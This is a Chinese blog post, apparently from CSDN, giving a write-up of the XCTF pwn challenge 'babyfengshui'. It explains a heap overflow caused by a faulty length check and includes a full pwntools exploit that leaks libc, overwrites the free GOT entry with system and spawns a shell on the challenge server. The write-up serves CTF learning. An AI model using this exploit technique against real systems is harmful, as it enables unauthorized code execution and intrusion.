[XCTF-pwn] 27_babyfengshui

最新推荐文章于 2023-03-15 22:50:00 发布
最新推荐文章于 2023-03-15 22:50:00 发布
阅读量352 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/123351078
版权

输入长度判断错误。可写溢出。

数据结构:

        管理块0x80: char *data_ptr; name[0x7c]

         先写数据块再写管理块

unsigned int __cdecl read_text(unsigned __int8 a1)
{
  char v2; // [esp+17h] [ebp-11h] BYREF
  int v3; // [esp+18h] [ebp-10h] BYREF
  unsigned int v4; // [esp+1Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  if ( a1 < (unsigned __int8)byte_804B069 && *(&ptr + a1) )
  {
    v3 = 0;
    printf("text length: ");
    __isoc99_scanf("%u%c", &v3, &v2);
    if ( (char *)(v3 + *(_DWORD *)*(&ptr + a1)) >= (char *)*(&ptr + a1) - 4 )// 长度越界判断,可写溢出
    {
      puts("my l33t defenses cannot be fooled, cya!");
      exit(1);
    }
    printf("text: ");
    get_data(*(char **)*(&ptr + a1), v3 + 1);
  }
  return __readgsdword(0x14u) ^ v4;
}                                               // 20T1,80M1,20T2,80M2
                                                // F20,F80,20T2,80M2
                                                // F20,80T3,20T2,80M2,80M3
                                                // 20T4,80T3,20T2,80M2,80M3,80M4

输入长度判断,要求输入止地址小于管理块指针地址-4。当数据块和管理块间有其它块时,将可进行覆盖。

解题思路:

  1.  建两个小块8字节
  2. 释放0块这里会得到1个8字节的fastbin,和一个0x80的unsort
  3. 再建0x80的块,数据块会使用刚释放的0x80的unsort,管理块在块1后新建。再建8字节块,这个块的数据块与管理块间的块1可被覆盖
  4. 编辑3块(上步新建的)覆盖1块的指针为got.free然后show1得到libc
  5. 再编辑1块(data指针指向got.free)修改free为system
  6. 释放带/bin/sh的块

完整exp:

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF("/home/shi/libc6-i386_2.23-0ubuntu11.3/libc-2.23.so")
    one = [0x3a81c,0x3a81e,0x3a822,0x3a829,0x5f075,0x5f076]
    offset_main_ret = 0x18647
else:
    p = remote('111.200.241.244', 54260) 
    libc_elf = ELF('/home/shi/buuctf/libc6-i386_2.23-0ubuntu10_amd64.so')
    one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
    offset_main_ret = 0x18637

elf = ELF('./pwn')
context(arch='i386', log_level='debug')

menu = b"Action: "
def add(size, name, text):
    p.sendlineafter(menu, b'0')
    p.sendlineafter(b"size of description: ", str(size).encode())
    p.sendlineafter(b"name: ", name)
    p.sendlineafter(b"text length: ", str(len(text)).encode())
    p.sendafter(b"text: ", text)

def free(idx):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"index: ", str(idx).encode())

def show(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"index: ", str(idx).encode())

def edit(idx, text):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"index: ", str(idx).encode())
    p.sendlineafter(b"text length: ", str(len(text)).encode())
    p.sendafter(b"text: ", text)

add(8, b'0', b'A')
add(8, b'1', b'A')
free(0)
add(0x80, b'2', b'A')
add(8, b'3', b'A')
edit(3, b'/bin/sh\x00'.ljust(0xa4, b'A')+p32(0x89)+p32(elf.got['free']))
show(1)
p.recvuntil(b'tion: ')
libc_base = u32(p.recv(4)) - libc_elf.sym['free']
libc_elf.address = libc_base
print('libc:', hex(libc_base))

edit(1, p32(libc_elf.sym['system']))
free(3)

p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C语言详解 - 文件
weixin_30274627的博客
10-08 957
1. 需要了解的概念 需要理解的知识点包括:数据流、缓冲区、文件类型、文件存取方式 1.1 数据流: 指程序与数据的交互是以流的形式进行的。进行C语言文件的存取时,都会先进行“打开文件”操作,这个操作就是在打开数据流,而“关闭文件”操作就是关闭数据流。 1.2 缓冲区(Buffer): 指在程序执行时,所提供的额外内存,可用来暂时存放做准备执行的数据。它的设置是为了提高存取效率,因为...
pwn】 33c32016_babyfengshui
Nothing
12-13 233
例行检查 分析程序,注意到在输入内容的时候,输入限制是这样的。 if ( (char *)(v3 + *(_DWORD *)*(&ptr + a1)) >= (char *)*(&ptr + a1) - 4 ) { puts("my l33t defenses cannot be fooled, cya!"); exit(1); ...
(攻防世界)(pwnbabyfengshui
PLpa的博客
08-03 1301
入门级的堆题,拿来学习还是不错的。 做这道题之前,最好还是先对堆的数据结构有一定的了解。 拿到题目,下载附件,查看保护。 一个32位的程序,开了NX和Canary保护,这都不是重头戏毕竟这题不用栈,栈保护只是锦上添花罢了。 把文件拖进IDA查看逻辑: 可以看到,典型的菜单题,这很pwn,实现了增删改查四个功能,像极了C语言程序设计的期末结业程序设计题哈哈哈,暴露年龄。 进入增加用户功能: 可...
windows环境DLL链接问题之二:C/C++修饰符问题
飘吧~梅时梅刻
08-29 609
在windows环境DLL链接问题之一中,简要了讲述了Dllimport的问题,但是贴在其中的代码还没有详细解释,现在就来看一下吧! 为了解释C/C++修饰符的问题,简单了写了个测试文件,用来测试DLL文件的功能。代码如: // DllCommain.cpp : Defines the entry point for the console application. // #include
babyfengshui 堆溢出的入门题
qq_41071646的博客
02-11 1704
本文 参考资料 https://github.com/firmianay/CTF-All-In-One 感谢 作者的 无私奉献 若是侵权 请联系 本人 本人会修改或删除 这道题 其实我也是看这篇文章才撸会的 怎么说呢 这个题 本来 我也是有点迷糊的 补了一些 堆溢出的资料 就懂了许多 这里我是结合资料 来写的 本人也是一个菜虾 要是哪里不对 还请指教 ...
【buu】babyfengshui_33c3_2016(详细题解)
qq_62068476的博客
03-15 321
buu日常一题
攻防世界PWNBabyfengshui题解
seaaseesa的博客
11-06 982
本题,首先,为了方便调试,我们需要解决alarm clock问题 程序运行几十秒后就会自动退出,所以,为了方便调试,我们需要先修改一下这个二进制 我们用十六进制编辑器把这几个指令nop(0x90)掉即可 然后,我们就开始做题了 查看创建功能的函数 这里创建了两个堆,第一个堆用来存储description,第二个堆用来存储第一个堆的指针以及name字符串 其数据...
pwn】 0ctf_2017_babyheap
Nothing
12-11 604
例行检查 保护全开。 分析程序。在fill函数中存在溢出,通overlap,泄露libc。然后fastbin attack。 from pwn import * io=remote('node3.buuoj.cn',27627) libc=ELF('./libc-2.23.so') def add(size): io.recvuntil('Command: ') io.send...
XCTF-HW-pipeline附件
11-09
附件
XCTF-RE】新手练习区-open-source.c
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/zgwso7
XCTF-RE】新手练习区-csaw2013reversing2.exe
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ova41g
XCTF-mobile app2
01-03
app2-安卓逆向1.提取文件2.分析文件3.分析XML文件4.经过验证得到flag5....下载地址:点此下载 1.提取文件 更改app安装包后缀为zip 把这3个文件解压出来 ...然后使用dex2jar将dex文件转换为jar文件,得到一个jar文件,这个...
XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
babyfengshui [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列23
重新启程
12-26 807
题目地址:babyfengshui 这个题目是高手进阶区的第12题。本题的主要考点是堆溢出,现在ctf主要的考点都已经转移到了堆溢出了,这个题目作为堆溢出的基础题目,还是很容易入门的。 先看看题目 惯例检查一下保护机制: [*] '/ctf/work/python/babyfengshui/babyfengshui' Arch: i386-32-little RE...
babyfengshui(xctf)
weixin_43868725的博客
08-21 199
0x0 程序保护和流程 保护: 流程: main() add_user() 连续分配了两个堆块,并将第一次分配的堆块的指针存入第二次分配的堆块的fd字段,bk字段开始存放name,之后调用了update_user() 输入完length之后要经过判断,需要第一次分配的堆块的数据段的地址加上输入的长度的值必须小于第二次分配的堆块的数据段的地址减4的值才能输入text。 delete_user() 根据索引分别释放两个堆块,再将指向第二次分配堆块的指针清零。 display_user() 根据索引输
babyfengshui-堆溢出
playmaker的博客
07-31 207
babyfengshui-堆溢出 题目是一个32位的选单式程序,大致功能和保护如下 逐一分析各个功能,首先是Add_user部分 printf("size of description: "); __isoc99_scanf("%u%c", &v2, &v0); sub_8048816(v2); _DWORD *__cdecl sub_80...
babyfengshui__BUUCTF
Jc
09-29 571
其实这个题用了两天,第一天拿上题的时候比较浮躁,也没什么分析的效果,把题做出来了,写个文章大家分析交流 我看网上大家都说这个题适合入门堆得看,其实我感觉要是没接触过堆得话,理解起来还是比较困难的,我会将自己做题的思路记录下来,让大家少踩点坑 做题思路 1.查看安全机制/文件信息 2.分析IDA,梳理思路很重要 3.分析构造漏洞利用(其实自己都是一步步来的,毕竟还是个小白呢) 4.编写EXP文件 安...
babyfengshui_33c3_2016中提升抽象能力
Probeginner的博客
07-01 115
堆学习,写功能,修改被写地址
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长
最新发布
08-12
人力资源+大数据+薪酬报告+涨薪调薪,在学习、工作生活中,越来越多的事务都会使用到报告,通常情况下,报告的内容含量大、篇幅较长。那么什么样的薪酬报告才是有效的呢?以下是小编精心整理的调薪申请报告,欢迎大家分享。相信老板看到这样的报告,一定会考虑涨薪的哦。
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值